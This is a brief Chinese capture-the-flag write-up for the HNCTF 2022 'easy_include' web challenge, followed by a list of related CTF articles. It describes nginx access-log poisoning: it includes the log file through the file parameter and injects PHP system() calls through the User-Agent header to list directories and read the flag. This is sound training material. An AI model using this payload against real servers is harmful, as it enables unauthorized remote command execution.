NSS [HNCTF 2022 WEEK2]easy_include

简介: NSS [HNCTF 2022 WEEK2]easy_include

NSS [HNCTF 2022 WEEK2]easy_include

过滤好多,试试日志包含。

服务器是nginx

?file=/var/log/nginx/access.log

修改UA头为<?php system(‘ls’); ?>

修改UA头为<?php system(‘ls /’); ?>

修改UA头为<?php system('tac /ffflllaaaggg'); ?>

目录
相关文章
BUUCTF [SWPU2019]我有一只马里奥 1
BUUCTF [SWPU2019]我有一只马里奥 1
712 0
BUUCTF [SWPU2019]我有一只马里奥 1
|
网络安全 数据安全/隐私保护 Python
[网络安全/CTF]护网杯 2018 easy_tornado 解题详析(Tornado之SSTI注入)
[网络安全/CTF]护网杯 2018 easy_tornado 解题详析(Tornado之SSTI注入)
395 0
|
PHP
NSS [NISACTF 2022]level-up
NSS [NISACTF 2022]level-up
277 0
|
PHP
NSS [鹏城杯 2022]简单包含
NSS [鹏城杯 2022]简单包含
147 0
NSS [SWPUCTF 2021 新生赛]pop
NSS [SWPUCTF 2021 新生赛]pop
215 0
NSS [HNCTF 2022 WEEK2]ez_ssrf
NSS [HNCTF 2022 WEEK2]ez_ssrf
186 0
|
JSON 开发框架 网络安全
[网络安全] Dirsearch 工具的安装、使用详细教程
[网络安全] Dirsearch 工具的安装、使用详细教程
9529 0
|
存储 JSON 数据安全/隐私保护
[LitCTF 2023]Flag点击就送!(cookie伪造)
[LitCTF 2023]Flag点击就送!(cookie伪造)
693 0
NSS [SWPUCTF 2022 新生赛]where_am_i
NSS [SWPUCTF 2022 新生赛]where_am_i
222 0
|
数据安全/隐私保护
NSS [SWPUCTF 2022 新生赛]奇妙的MD5
NSS [SWPUCTF 2022 新生赛]奇妙的MD5
233 0

热门文章

最新文章